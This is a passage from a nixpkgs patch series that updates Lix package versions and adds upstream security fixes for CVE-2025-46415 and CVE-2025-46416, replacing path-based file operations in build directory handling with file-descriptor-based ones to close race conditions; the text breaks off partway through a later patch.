b/pkgs/tools/package-management/lix/default.nix index 6deb817e9151..00876663b1b0 100644 --- a/pkgs/tools/package-management/lix/default.nix +++ b/pkgs/tools/package-management/lix/default.nix @@ -216,14 +216,14 @@ lib.makeExtensible (self: { attrName = "lix_2_93"; lix-args = rec { - version = "2.93.0"; + version = "2.93.1"; src = fetchFromGitea { domain = "git.lix.systems"; owner = "lix-project"; repo = "lix"; rev = version; - hash = "sha256-hsFe4Tsqqg4l+FfQWphDtjC79WzNCZbEFhHI8j2KJzw="; + hash = "sha256-LmQhjQ7c+AOkwhvR9GFgJOy8oHW35MoQRELtrwyVnPw="; }; cargoDeps = rustPlatform.fetchCargoVendor { From dc090e801c261f2bb6f7593062fc6215db73c2bd Mon Sep 17 00:00:00 2001 From: Raito Bezarius Date: Tue, 24 Jun 2025 16:22:39 +0200 Subject: [PATCH 66/73] lixPackageSets.lix_2_92: patch for CVE-2025-4641{5,6} Change-Id: Ie7ec879d499be1e67982871659f3a414157a329d Signed-off-by: Raito Bezarius --- pkgs/tools/package-management/lix/default.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/tools/package-management/lix/default.nix b/pkgs/tools/package-management/lix/default.nix index 00876663b1b0..b5e92d698bff 100644 --- a/pkgs/tools/package-management/lix/default.nix +++ 
b/pkgs/tools/package-management/lix/default.nix @@ -186,13 +186,13 @@ lib.makeExtensible (self: { attrName = "lix_2_92"; lix-args = rec { - version = "2.92.0"; + version = "2.92.2"; src = fetchFromGitHub { owner = "lix-project"; repo = "lix"; rev = version; - hash = "sha256-CCKIAE84dzkrnlxJCKFyffAxP3yfsOAbdvydUGqq24g="; + hash = "sha256-D7YepvFkGE4K1rOkEYA1P6wGj/eFbQXb03nLdBRjjwA="; }; cargoDeps = rustPlatform.fetchCargoVendor { From cafe161f051c38854b93079d71603781ae14e03a Mon Sep 17 00:00:00 2001 From: Raito Bezarius Date: Tue, 24 Jun 2025 16:23:24 +0200 Subject: [PATCH 67/73] lixPackageSets.git: patch for CVE-2025-4641{5,6} Change-Id: I5990ddd1d7eb16ca5023d4496550d67c4e361bc9 Signed-off-by: Raito Bezarius --- pkgs/tools/package-management/lix/default.nix | 4 + .../LIX_HEAD_CVE-2025-46415_46416.patch | 2363 +++++++++++++++++ 2 files changed, 2367 insertions(+) create mode 100644 pkgs/tools/package-management/lix/patches/LIX_HEAD_CVE-2025-46415_46416.patch diff --git a/pkgs/tools/package-management/lix/default.nix b/pkgs/tools/package-management/lix/default.nix index b5e92d698bff..b348407056f3 100644 --- a/pkgs/tools/package-management/lix/default.nix +++ b/pkgs/tools/package-management/lix/default.nix @@ -253,6 +253,10 @@ lib.makeExtensible (self: { inherit src; hash = "sha256-YMyNOXdlx0I30SkcmdW/6DU0BYc3ZOa2FMJSKMkr7I8="; }; + + patches = [ + ./patches/LIX_HEAD_CVE-2025-46415_46416.patch + ]; }; }; diff --git a/pkgs/tools/package-management/lix/patches/LIX_HEAD_CVE-2025-46415_46416.patch b/pkgs/tools/package-management/lix/patches/LIX_HEAD_CVE-2025-46415_46416.patch new file mode 100644 index 000000000000..130aa2e5eaf3 --- /dev/null +++ b/pkgs/tools/package-management/lix/patches/LIX_HEAD_CVE-2025-46415_46416.patch @@ -0,0 +1,2363 @@ +From c7976e63a3d93386b2811dba2b92ba452c561696 Mon Sep 17 00:00:00 2001 +From: Raito Bezarius +Date: Wed, 26 Mar 2025 01:04:12 +0100 +Subject: [SECURITY FIX 01/12] libutil: guess or invent a path from file + descriptors + +This is useful for certain error recovery paths (no pun intended) that +does not thread through the original path name. + +Change-Id: I2d800740cb4f9912e64c923120d3f977c58ccb7e +Signed-off-by: Raito Bezarius +--- + lix/libutil/file-descriptor.cc | 23 ++++++++++ + lix/libutil/file-descriptor.hh | 18 ++++++++ + meson.build | 5 +++ + tests/unit/libutil/tests.cc | 81 ++++++++++++++++++++++++++++++++++ + 4 files changed, 127 insertions(+) + +diff --git a/lix/libutil/file-descriptor.cc b/lix/libutil/file-descriptor.cc +index 39a4e0bdd..83496b6a6 100644 +--- a/lix/libutil/file-descriptor.cc ++++ b/lix/libutil/file-descriptor.cc +@@ -155,6 +155,29 @@ int AutoCloseFD::get() const + return fd; + } + ++std::string guessOrInventPathFromFD(int fd) ++{ ++ assert(fd >= 0); ++ /* On Linux, there's no F_GETPATH available. ++ * But we can read /proc/ */ ++#if __linux__ ++ try { ++ return readLink(fmt("/proc/self/fd/%1%", fd).c_str()); ++ } catch (...) { ++ } ++#elif defined (HAVE_F_GETPATH) && HAVE_F_GETPATH ++ std::string fdName(PATH_MAX, '\0'); ++ if (fcntl(fd, F_GETPATH, fdName.data()) != -1) { ++ fdName.resize(strlen(fdName.c_str())); ++ return fdName; ++ } ++#else ++#error "No implementation for retrieving file descriptors path." 
++#endif
++
++    return fmt("", fd);
++}
++
+ 
+ void AutoCloseFD::close()
+ {
+diff --git a/lix/libutil/file-descriptor.hh b/lix/libutil/file-descriptor.hh
+index 5331751cb..6c1c698fc 100644
+--- a/lix/libutil/file-descriptor.hh
++++ b/lix/libutil/file-descriptor.hh
+@@ -36,6 +36,15 @@ void writeFull(int fd, std::string_view s, bool allowInterrupts = true);
+  */
+ std::string drainFD(int fd, bool block = true, const size_t reserveSize=0);
+ 
++
++/*
++ * Will attempt to guess *A* path that might lead to the same file as the one used by this
++ * file descriptor.
++ *
++ * The returned string should NEVER be used as a valid path.
++ */
++std::string guessOrInventPathFromFD(int fd);
++
+ Generator drainFDSource(int fd, bool block = true);
+ 
+ class AutoCloseFD
+@@ -50,6 +59,15 @@ public:
+     AutoCloseFD& operator =(const AutoCloseFD & fd) = delete;
+     AutoCloseFD& operator =(AutoCloseFD&& fd) noexcept(false);
+     int get() const;
++
++    /*
++     * Will attempt to guess *A* path that might lead to the same file as the one used by this
++     * file descriptor.
++     *
++     * The returned string should NEVER be used as a valid path.
++     */
++    std::string guessOrInventPath() const { return guessOrInventPathFromFD(fd); }
++
+     explicit operator bool() const;
+     int release();
+     void close();
+diff --git a/meson.build b/meson.build
+index f0443bbd1..92b4c05ec 100644
+--- a/meson.build
++++ b/meson.build
+@@ -266,6 +266,11 @@ configdata += {
+   'HAVE_SECCOMP': seccomp.found().to_int(),
+ }
+ 
++# fcntl(F_GETPATH) returns the path of an fd on macOS and BSDs
++configdata += {
++  'HAVE_F_GETPATH': cxx.has_header_symbol('fcntl.h', 'F_GETPATH').to_int(),
++}
++
+ libarchive = dependency('libarchive', required : true, include_type : 'system')
+ 
+ brotli = [
+diff --git a/tests/unit/libutil/tests.cc b/tests/unit/libutil/tests.cc
+index 3b865cb82..263fd7834 100644
+--- a/tests/unit/libutil/tests.cc
++++ b/tests/unit/libutil/tests.cc
+@@ -3,6 +3,8 @@
+ #include "lix/libutil/strings.hh"
+ #include "lix/libutil/types.hh"
+ #include "lix/libutil/terminal.hh"
++#include "lix/libutil/unix-domain-socket.hh"
++#include "tests/test-data.hh"
+ 
+ #include 
+ 
+@@ -207,6 +209,85 @@ namespace nix {
+         ASSERT_FALSE(pathExists("/schnitzel/darmstadt/pommes"));
+     }
+ 
++    /* ----------------------------------------------------------------------------
++     * AutoCloseFD::guessOrInventPath
++     * --------------------------------------------------------------------------*/
++    void testGuessOrInventPathPrePostDeletion(AutoCloseFD & fd, Path & path) {
++        {
++            SCOPED_TRACE(fmt("guessing path before deletion of '%1%'", path));
++            ASSERT_TRUE(fd);
++            /* We cannot predict what the platform will return here.
++             * But it cannot fail. */
++            ASSERT_TRUE(fd.guessOrInventPath().size() >= 0);
++        }
++        {
++            SCOPED_TRACE(fmt("guessing path after deletion of '%1%'", path));
++            deletePath(path);
++            /* We cannot predict what the platform will return here.
++             * But it cannot fail.
*/ ++ ASSERT_TRUE(fd.guessOrInventPath().size() >= 0); ++ } ++ } ++ TEST(guessOrInventPath, files) { ++ Path filePath = getUnitTestDataPath("guess-or-invent/test.txt"); ++ createDirs(dirOf(filePath)); ++ writeFile(filePath, "some text"); ++ AutoCloseFD file{open(filePath.c_str(), O_RDONLY, 0666)}; ++ testGuessOrInventPathPrePostDeletion(file, filePath); ++ } ++ ++ TEST(guessOrInventPath, directories) { ++ Path dirPath = getUnitTestDataPath("guess-or-invent/test-dir"); ++ createDirs(dirPath); ++ AutoCloseFD directory{open(dirPath.c_str(), O_DIRECTORY, 0666)}; ++ testGuessOrInventPathPrePostDeletion(directory, dirPath); ++ } ++ ++#ifdef O_PATH ++ TEST(guessOrInventPath, symlinks) { ++ Path symlinkPath = getUnitTestDataPath("guess-or-invent/test-symlink"); ++ Path targetPath = getUnitTestDataPath("guess-or-invent/nowhere"); ++ createDirs(dirOf(symlinkPath)); ++ createSymlink(targetPath, symlinkPath); ++ AutoCloseFD symlink{open(symlinkPath.c_str(), O_PATH | O_NOFOLLOW, 0666)}; ++ testGuessOrInventPathPrePostDeletion(symlink, symlinkPath); ++ } ++ ++ TEST(guessOrInventPath, fifos) { ++ Path fifoPath = getUnitTestDataPath("guess-or-invent/fifo"); ++ createDirs(dirOf(fifoPath)); ++ ASSERT_TRUE(mkfifo(fifoPath.c_str(), 0666) == 0); ++ AutoCloseFD fifo{open(fifoPath.c_str(), O_PATH | O_NOFOLLOW, 0666)}; ++ testGuessOrInventPathPrePostDeletion(fifo, fifoPath); ++ } ++#endif ++ ++ TEST(guessOrInventPath, pipes) { ++ int pipefd[2]; ++ ++ ASSERT_TRUE(pipe(pipefd) == 0); ++ ++ AutoCloseFD pipe_read{pipefd[0]}; ++ ASSERT_TRUE(pipe_read); ++ AutoCloseFD pipe_write{pipefd[1]}; ++ ASSERT_TRUE(pipe_write); ++ ++ /* We cannot predict what the platform will return here. ++ * But it cannot fail. */ ++ ASSERT_TRUE(pipe_read.guessOrInventPath().size() >= 0); ++ ASSERT_TRUE(pipe_write.guessOrInventPath().size() >= 0); ++ pipe_write.close(); ++ ASSERT_TRUE(pipe_read.guessOrInventPath().size() >= 0); ++ pipe_read.close(); ++ } ++ ++ TEST(guessOrInventPath, sockets) { ++ Path socketPath = getUnitTestDataPath("guess-or-invent/socket"); ++ createDirs(dirOf(socketPath)); ++ AutoCloseFD socket = createUnixDomainSocket(socketPath, 0666); ++ testGuessOrInventPathPrePostDeletion(socket, socketPath); ++ } ++ + /* ---------------------------------------------------------------------------- + * concatStringsSep + * --------------------------------------------------------------------------*/ +-- +2.49.0 + + +From bcf1f27fec3b18c33e7b76384cebd95b105f9357 Mon Sep 17 00:00:00 2001 +From: Raito Bezarius +Date: Wed, 26 Mar 2025 01:04:59 +0100 +Subject: [SECURITY FIX 02/12] libstore: open build directory as a dirfd as + well + +We now keep around a proper AutoCloseFD around the temporary directory +which we plan to use for openat operations and avoiding the build +directory being swapped out while we are doing something else. 
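+
+As a rough illustration (hypothetical call site, not code from this
+change), the pattern this enables is resolving names relative to the
+held descriptor instead of re-walking the path:
+
+    /* because the name is resolved relative to tmpDirFd, a tmpDir that
+     * is swapped out underneath us can no longer redirect the open */
+    AutoCloseFD fd{openat(tmpDirFd.get(), "some-file",
+        O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW | O_CLOEXEC, 0666)};
+    if (!fd)
+        throw SysError("opening file in the build directory");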
+ +Change-Id: I18d387b0f123ebf2d20c6405cd47ebadc5505f2a +Signed-off-by: Raito Bezarius +--- + lix/libstore/build/local-derivation-goal.cc | 5 +++++ + lix/libstore/build/local-derivation-goal.hh | 5 +++++ + 2 files changed, 10 insertions(+) + +diff --git a/lix/libstore/build/local-derivation-goal.cc b/lix/libstore/build/local-derivation-goal.cc +index 5de4fdec5..fc6e925f3 100644 +--- a/lix/libstore/build/local-derivation-goal.cc ++++ b/lix/libstore/build/local-derivation-goal.cc +@@ -441,6 +441,11 @@ try { + false, + 0700 + ); ++ /* The TOCTOU between the previous mkdir call and this open call is unavoidable due to ++ * POSIX semantics.*/ ++ tmpDirFd = AutoCloseFD{open(tmpDir.c_str(), O_RDONLY | O_NOFOLLOW | O_DIRECTORY)}; ++ if (!tmpDirFd) ++ throw SysError("failed to open the build temporary directory descriptor '%1%'", tmpDir); + + chownToBuilder(tmpDir); + +diff --git a/lix/libstore/build/local-derivation-goal.hh b/lix/libstore/build/local-derivation-goal.hh +index ec874ecea..5b9051ede 100644 +--- a/lix/libstore/build/local-derivation-goal.hh ++++ b/lix/libstore/build/local-derivation-goal.hh +@@ -42,6 +42,11 @@ struct LocalDerivationGoal : public DerivationGoal + */ + Path tmpDir; + ++ /** ++ * The temporary directory file descriptor ++ */ ++ AutoCloseFD tmpDirFd; ++ + /** + * The path of the temporary directory in the sandbox. + */ +-- +2.49.0 + + +From 10509774edf5f6cae9a17ff9b656e4fb42c996f8 Mon Sep 17 00:00:00 2001 +From: Raito Bezarius +Date: Wed, 26 Mar 2025 01:05:34 +0100 +Subject: [SECURITY FIX 03/12] libstore: chown to builder variant for file + descriptors + +We use it immediately for the build temporary directory. + +Change-Id: I180193c63a2b98721f5fb8e542c4e39c099bb947 +Signed-off-by: Raito Bezarius +--- + lix/libstore/build/local-derivation-goal.cc | 9 ++++++++- + lix/libstore/build/local-derivation-goal.hh | 10 +++++++++- + 2 files changed, 17 insertions(+), 2 deletions(-) + +diff --git a/lix/libstore/build/local-derivation-goal.cc b/lix/libstore/build/local-derivation-goal.cc +index fc6e925f3..6d93c6841 100644 +--- a/lix/libstore/build/local-derivation-goal.cc ++++ b/lix/libstore/build/local-derivation-goal.cc +@@ -447,7 +447,7 @@ try { + if (!tmpDirFd) + throw SysError("failed to open the build temporary directory descriptor '%1%'", tmpDir); + +- chownToBuilder(tmpDir); ++ chownToBuilder(tmpDirFd); + + for (auto & [outputName, status] : initialOutputs) { + /* Set scratch path we'll actually use during the build. +@@ -931,6 +931,13 @@ void LocalDerivationGoal::chownToBuilder(const Path & path) + throw SysError("cannot change ownership of '%1%'", path); + } + ++void LocalDerivationGoal::chownToBuilder(const AutoCloseFD & fd) ++{ ++ if (!buildUser) return; ++ if (fchown(fd.get(), buildUser->getUID(), buildUser->getGID()) == -1) ++ throw SysError("cannot change ownership of file '%1%'", fd.guessOrInventPath()); ++} ++ + + void LocalDerivationGoal::runChild() + { +diff --git a/lix/libstore/build/local-derivation-goal.hh b/lix/libstore/build/local-derivation-goal.hh +index 5b9051ede..eb2fe50f3 100644 +--- a/lix/libstore/build/local-derivation-goal.hh ++++ b/lix/libstore/build/local-derivation-goal.hh +@@ -202,10 +202,18 @@ struct LocalDerivationGoal : public DerivationGoal + kj::Promise> writeStructuredAttrs(); + + /** +- * Make a file owned by the builder. ++ * Make a file owned by the builder addressed by its path. ++ * ++ * SAFETY: this function is prone to TOCTOU as it receives a path and not a descriptor. 
++     * It is only safe to call on a child of a directory that is visible only to the owner.
+      */
+     void chownToBuilder(const Path & path);
+ 
++    /**
++     * Make a file owned by the builder addressed by its file descriptor.
++     */
++    void chownToBuilder(const AutoCloseFD & fd);
++
+     int getChildStatus() override;
+ 
+     /**
+-- 
+2.49.0
+
+
+From ee8382a01253059b8680d041b860b361cbde6192 Mon Sep 17 00:00:00 2001
+From: Raito Bezarius
+Date: Wed, 26 Mar 2025 01:06:03 +0100
+Subject: [SECURITY FIX 04/12] libutil: writeFile variant for file descriptors
+
+`writeFile` loses its `sync` boolean flag to make things simpler.
+
+A new `writeFileAndSync` function is created and all call sites are
+converted to it.
+
+Change-Id: Ib871a5283a9c047db1e4fe48a241506e4aab9192
+Signed-off-by: Raito Bezarius
+---
+ lix/libstore/local-store.cc |  4 +--
+ lix/libutil/file-system.cc  | 50 ++++++++++++++++++++++++++-----------
+ lix/libutil/file-system.hh  | 22 ++++++++--------
+ 3 files changed, 49 insertions(+), 27 deletions(-)
+
+diff --git a/lix/libstore/local-store.cc b/lix/libstore/local-store.cc
+index 3d75be2f4..1d4ba8665 100644
+--- a/lix/libstore/local-store.cc
++++ b/lix/libstore/local-store.cc
+@@ -224,7 +224,7 @@ void LocalStore::initDB(DBState & state)
+     else if (curSchema == 0) { /* new store */
+         curSchema = nixSchemaVersion;
+         openDB(state, true);
+-        writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, true);
++        writeFileAndSync(schemaPath, fmt("%1%", nixSchemaVersion), 0666);
+     }
+ 
+     else if (curSchema < nixSchemaVersion) {
+@@ -277,7 +277,7 @@ void LocalStore::initDB(DBState & state)
+             txn.commit();
+         }
+ 
+-        writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, true);
++        writeFileAndSync(schemaPath, fmt("%1%", nixSchemaVersion), 0666);
+ 
+         lockFile(globalLock.get(), ltRead, always_progresses);
+     }
+diff --git a/lix/libutil/file-system.cc b/lix/libutil/file-system.cc
+index 47fc2f7ba..0fe70d938 100644
+--- a/lix/libutil/file-system.cc
++++ b/lix/libutil/file-system.cc
+@@ -358,28 +358,49 @@ Generator readFileSource(const Path & path)
+     }(std::move(fd));
+ }
+ 
+-void writeFile(const Path & path, std::string_view s, mode_t mode, bool sync, bool allowInterrupts)
++void writeFile(const Path & path, std::string_view s, mode_t mode, bool allowInterrupts)
+ {
+     AutoCloseFD fd{open(path.c_str(), O_WRONLY | O_TRUNC | O_CREAT | O_CLOEXEC, mode)};
+     if (!fd)
+         throw SysError("opening file '%1%'", path);
++
++    writeFile(fd, s, mode, allowInterrupts);
++
++    /* Close explicitly to propagate the exceptions. */
++    fd.close();
++}
++
++void writeFile(AutoCloseFD & fd, std::string_view s, mode_t mode, bool allowInterrupts)
++{
++    assert(fd);
+     try {
+         writeFull(fd.get(), s, allowInterrupts);
+     } catch (Error & e) {
+-        e.addTrace({}, "writing file '%1%'", path);
++        e.addTrace({}, "writing file '%1%'", fd.guessOrInventPath());
+         throw;
+     }
+-    if (sync)
+-        fd.fsync();
+-    // Explicitly close to make sure exceptions are propagated.
+-    fd.close();
+-    if (sync)
+-        syncParent(path);
+ }
+ 
+-void writeFileUninterruptible(const Path & path, std::string_view s, mode_t mode, bool sync)
++void writeFileUninterruptible(const Path & path, std::string_view s, mode_t mode)
++{
++    writeFile(path, s, mode, false);
++}
++
++void writeFileAndSync(const Path & path, std::string_view s, mode_t mode)
+ {
+-    writeFile(path, s, mode, sync, false);
++    {
++        AutoCloseFD fd{open(path.c_str(), O_WRONLY | O_TRUNC | O_CREAT | O_CLOEXEC, mode)};
++        if (!fd) {
++            throw SysError("opening file '%1%'", path);
++        }
++
++        writeFile(fd, s, mode);
++        fd.fsync();
++        /* Close explicitly to ensure that exceptions are propagated. */
++        fd.close();
++    }
++
++    syncParent(path);
+ }
+ 
+ static AutoCloseFD openForWrite(const Path & path, mode_t mode)
+@@ -400,7 +421,7 @@ static void closeForWrite(const Path & path, AutoCloseFD & fd, bool sync)
+     syncParent(path);
+ }
+ 
+-void writeFile(const Path & path, Source & source, mode_t mode, bool sync)
++void writeFile(const Path & path, Source & source, mode_t mode)
+ {
+     AutoCloseFD fd = openForWrite(path, mode);
+ 
+@@ -417,11 +438,10 @@ void writeFile(const Path & path, Source & source, mode_t mode, bool sync)
+         e.addTrace({}, "writing file '%1%'", path);
+         throw;
+     }
+-    closeForWrite(path, fd, sync);
++    closeForWrite(path, fd, false);
+ }
+ 
+-kj::Promise>
+-writeFile(const Path & path, AsyncInputStream & source, mode_t mode, bool sync)
++kj::Promise> writeFile(const Path & path, AsyncInputStream & source, mode_t mode)
+ try {
+     AutoCloseFD fd = openForWrite(path, mode);
+ 
+@@ -439,7 +459,7 @@ try {
+         e.addTrace({}, "writing file '%1%'", path);
+         throw;
+     }
+-    closeForWrite(path, fd, sync);
++    closeForWrite(path, fd, false);
+     co_return result::success();
+ } catch (...) {
+     co_return result::current_exception();
+diff --git a/lix/libutil/file-system.hh b/lix/libutil/file-system.hh
+index 7d76b4fd0..a6267825d 100644
+--- a/lix/libutil/file-system.hh
++++ b/lix/libutil/file-system.hh
+@@ -190,19 +190,21 @@ Generator readFileSource(const Path & path);
+  * Write a string to a file.
+  */
+ void writeFile(
+-    const Path & path,
+-    std::string_view s,
+-    mode_t mode = 0666,
+-    bool sync = false,
+-    bool allowInterrupts = true
+-);
+-void writeFileUninterruptible(
+-    const Path & path, std::string_view s, mode_t mode = 0666, bool sync = false
++    const Path & path, std::string_view s, mode_t mode = 0666, bool allowInterrupts = true
+ );
++void writeFileUninterruptible(const Path & path, std::string_view s, mode_t mode = 0666);
++void writeFile(const Path & path, Source & source, mode_t mode = 0666);
+ 
+-void writeFile(const Path & path, Source & source, mode_t mode = 0666, bool sync = false);
++void writeFile(
++    AutoCloseFD & fd, std::string_view s, mode_t mode = 0666, bool allowInterrupts = false
++);
+ kj::Promise>
+-writeFile(const Path & path, AsyncInputStream & source, mode_t mode = 0666, bool sync = false);
++writeFile(const Path & path, AsyncInputStream & source, mode_t mode = 0666);
++
++/**
++ * Write a string to a file and flush the file and its parent directory to disk.
++ */ ++void writeFileAndSync(const Path & path, std::string_view s, mode_t mode = 0666); + + /** + * Flush a file's parent directory to disk +-- +2.49.0 + + +From 8b93c4c17a7eabf7bdfd71da2bbe41454be96adb Mon Sep 17 00:00:00 2001 +From: Raito Bezarius +Date: Wed, 26 Mar 2025 01:07:47 +0100 +Subject: [SECURITY FIX 05/12] libstore: ensure that `passAsFile` is created in + the original temp dir + +This ensures that `passAsFile` data is created inside the expected +temporary build directory by `openat()` from the parent directory file +descriptor. + +This avoids a TOCTOU which is part of the attack chain of CVE-????. + +Change-Id: Ie5273446c4a19403088d0389ae8e3f473af8879a +Signed-off-by: Raito Bezarius +--- + lix/libstore/build/local-derivation-goal.cc | 9 +++++++-- + 1 file changed, 7 insertions(+), 2 deletions(-) + +diff --git a/lix/libstore/build/local-derivation-goal.cc b/lix/libstore/build/local-derivation-goal.cc +index 6d93c6841..c33bd8283 100644 +--- a/lix/libstore/build/local-derivation-goal.cc ++++ b/lix/libstore/build/local-derivation-goal.cc +@@ -814,8 +814,13 @@ void LocalDerivationGoal::initTmpDir() { + auto hash = hashString(HashType::SHA256, i.first); + std::string fn = ".attr-" + hash.to_string(Base::Base32, false); + Path p = tmpDir + "/" + fn; +- writeFile(p, rewriteStrings(i.second, inputRewrites)); +- chownToBuilder(p); ++ /* TODO(jade): we should have BorrowedFD instead of OwnedFD. */ ++ AutoCloseFD passAsFileFd{openat(tmpDirFd.get(), fn.c_str(), O_WRONLY | O_TRUNC | O_CREAT | O_CLOEXEC | O_EXCL | O_NOFOLLOW, 0666)}; ++ if (!passAsFileFd) { ++ throw SysError("opening `passAsFile` file in the sandbox '%1%'", p); ++ } ++ writeFile(passAsFileFd, rewriteStrings(i.second, inputRewrites)); ++ chownToBuilder(passAsFileFd); + env[i.first + "Path"] = tmpDirInSandbox + "/" + fn; + } + } +-- +2.49.0 + + +From d092cfa499fad3c661c7f07d2b5e0150b936db8e Mon Sep 17 00:00:00 2001 +From: Raito Bezarius +Date: Wed, 26 Mar 2025 12:42:55 +0100 +Subject: [SECURITY FIX 06/12] libutil: ensure that `_deletePath` does NOT use + absolute paths with dirfds + +When calling `_deletePath` with a parent file descriptor, `openat` is +made effective by using relative paths to the directory file descriptor. + +To avoid the problem, the signature is changed to resist misuse with an +assert in the prologue of the function. + +Change-Id: I6b3fc766bad2afe54dc27d47d1df3873e188de96 +Signed-off-by: Raito Bezarius +--- + lix/libutil/file-system.cc | 36 ++++++++++++++++++++++++------------ + 1 file changed, 24 insertions(+), 12 deletions(-) + +diff --git a/lix/libutil/file-system.cc b/lix/libutil/file-system.cc +index 0fe70d938..1b71caeb1 100644 +--- a/lix/libutil/file-system.cc ++++ b/lix/libutil/file-system.cc +@@ -473,18 +473,29 @@ void syncParent(const Path & path) + fd.fsync(); + } + +-static void _deletePath(int parentfd, const Path & path, uint64_t & bytesFreed, bool interruptible) ++/* TODO(horrors): a better structure that links all parent fds for the traversal root ++ * should be considered for this code ++ */ ++static void _deletePath(int parentfd, const std::string & name, uint64_t & bytesFreed, bool interruptible) + { ++ /* This ensures that `name` is an immediate child of `parentfd`. */ ++ assert(!name.empty() && name.find('/') == std::string::npos && "`name` is an immediate child to `parentfd`"); ++ + if (interruptible) { + checkInterrupt(); + } + +- std::string name(baseNameOf(path)); ++ /* FIXME(horrors): there's a minor TOCTOU here. 
++ * we fstatat the inode nofollow, check if this is a directory ++ * and then open it. ++ * a better alternative is open it as O_PATH as a namefd. ++ * if it's a directory, it can be openat with the namefd. ++ */ + + struct stat st; + if (fstatat(parentfd, name.c_str(), &st, AT_SYMLINK_NOFOLLOW) == -1) { + if (errno == ENOENT) return; +- throw SysError("getting status of '%1%'", path); ++ throw SysError("getting status of '%1%' in directory '%2%'", name, guessOrInventPathFromFD(parentfd)); + } + + if (!S_ISDIR(st.st_mode)) { +@@ -515,24 +526,25 @@ static void _deletePath(int parentfd, const Path & path, uint64_t & bytesFreed, + /* Make the directory accessible. */ + const auto PERM_MASK = S_IRUSR | S_IWUSR | S_IXUSR; + if ((st.st_mode & PERM_MASK) != PERM_MASK) { +- if (fchmodat(parentfd, name.c_str(), st.st_mode | PERM_MASK, 0) == -1) +- throw SysError("chmod '%1%'", path); ++ if (fchmodat(parentfd, name.c_str(), st.st_mode | PERM_MASK, 0) == -1) { ++ throw SysError("chmod '%1%' in directory '%2%'", name, guessOrInventPathFromFD(parentfd)); ++ } + } + +- int fd = openat(parentfd, path.c_str(), O_RDONLY); ++ int fd = openat(parentfd, name.c_str(), O_RDONLY | O_DIRECTORY | O_NOFOLLOW); + if (fd == -1) +- throw SysError("opening directory '%1%'", path); ++ throw SysError("opening directory '%1%' in directory '%2%'", name, guessOrInventPathFromFD(parentfd)); + AutoCloseDir dir(fdopendir(fd)); + if (!dir) +- throw SysError("opening directory '%1%'", path); +- for (auto & i : readDirectory(dir.get(), path, interruptible)) +- _deletePath(dirfd(dir.get()), path + "/" + i.name, bytesFreed, interruptible); ++ throw SysError("opening directory '%1%' in directory '%2%'", name, guessOrInventPathFromFD(parentfd)); ++ for (auto & i : readDirectory(dir.get(), name, interruptible)) ++ _deletePath(dirfd(dir.get()), i.name, bytesFreed, interruptible); + } + + int flags = S_ISDIR(st.st_mode) ? AT_REMOVEDIR : 0; + if (unlinkat(parentfd, name.c_str(), flags) == -1) { + if (errno == ENOENT) return; +- throw SysError("cannot unlink '%1%'", path); ++ throw SysError("cannot unlink '%1%' in directory '%2%'", name, guessOrInventPathFromFD(parentfd)); + } + } + +@@ -548,7 +560,7 @@ static void _deletePath(const Path & path, uint64_t & bytesFreed, bool interrupt + throw SysError("opening directory '%1%'", path); + } + +- _deletePath(dirfd.get(), path, bytesFreed, interruptible); ++ _deletePath(dirfd.get(), std::string(baseNameOf(path)), bytesFreed, interruptible); + } + + +-- +2.49.0 + + +From 500a7406a0f6fe2d9132da70d10688cfc7fa598d Mon Sep 17 00:00:00 2001 +From: eldritch horrors +Date: Mon, 17 Mar 2025 15:45:27 +0100 +Subject: [SECURITY FIX 07/12] libutil: make RunningProgram more useful + +make it moveable, make it killable, and add a stdout fd accessor. 
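+
+A rough usage sketch (hypothetical caller, not part of this change):
+
+    RunningProgram proc = runProgram2({.program = "some-helper", .captureStdout = true});
+    if (auto fd = proc.getStdoutFD())
+        ; /* hand *fd to a poll loop, stream the output, ... */
+    proc.kill(); /* tear the child down; returns its wait status */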
+ +Change-Id: I2387cbe8ac67b899a322cd6c7d306ef9ea7abcd0 +--- + lix/libcmd/repl.cc | 4 ++-- + lix/libfetchers/git.cc | 2 +- + lix/libstore/build/derivation-goal.cc | 2 +- + lix/libutil/processes.cc | 19 +++++++++++++++++-- + lix/libutil/processes.hh | 16 +++++++++++++++- + 5 files changed, 36 insertions(+), 7 deletions(-) + +diff --git a/lix/libcmd/repl.cc b/lix/libcmd/repl.cc +index 50ce1cd3a..5afebea93 100644 +--- a/lix/libcmd/repl.cc ++++ b/lix/libcmd/repl.cc +@@ -254,7 +254,7 @@ void runNix(Path program, const Strings & args) + .program = settings.nixBinDir+ "/" + program, + .args = args, + .environment = subprocessEnv, +- }).wait(); ++ }).waitAndCheck(); + + return; + } +@@ -672,7 +672,7 @@ ProcessLineResult NixRepl::processLine(std::string line) + + // runProgram redirects stdout to a StringSink, + // using runProgram2 to allow editors to display their UI +- runProgram2(RunOptions { .program = editor, .searchPath = true, .args = args }).wait(); ++ runProgram2(RunOptions { .program = editor, .searchPath = true, .args = args }).waitAndCheck(); + + // Reload right after exiting the editor if path is not in store + // Store is immutable, so there could be no changes, so there's no need to reload +diff --git a/lix/libfetchers/git.cc b/lix/libfetchers/git.cc +index b44ea997a..3231ec011 100644 +--- a/lix/libfetchers/git.cc ++++ b/lix/libfetchers/git.cc +@@ -777,7 +777,7 @@ struct GitInputScheme : InputScheme + .args = { "-C", repoDir, "--git-dir", gitDir, "archive", input.getRev()->gitRev() }, + .captureStdout = true, + }); +- Finally const _wait([&] { proc.wait(); }); ++ Finally const _wait([&] { proc.waitAndCheck(); }); + + unpackTarfile(*proc.getStdout(), tmpDir); + } +diff --git a/lix/libstore/build/derivation-goal.cc b/lix/libstore/build/derivation-goal.cc +index 6767bc37e..69e654490 100644 +--- a/lix/libstore/build/derivation-goal.cc ++++ b/lix/libstore/build/derivation-goal.cc +@@ -895,7 +895,7 @@ void runPostBuildHook( + }); + Finally const _wait([&] { + try { +- proc.wait(); ++ proc.waitAndCheck(); + } catch (nix::Error & e) { + e.addTrace(nullptr, + "while running the post-build-hook %s for derivation %s", +diff --git a/lix/libutil/processes.cc b/lix/libutil/processes.cc +index e2cc2515b..6b24d943f 100644 +--- a/lix/libutil/processes.cc ++++ b/lix/libutil/processes.cc +@@ -249,7 +249,7 @@ std::pair runProgram(RunOptions && options) + + try { + auto proc = runProgram2(options); +- Finally const _wait([&] { proc.wait(); }); ++ Finally const _wait([&] { proc.waitAndCheck(); }); + stdout = proc.getStdout()->drain(); 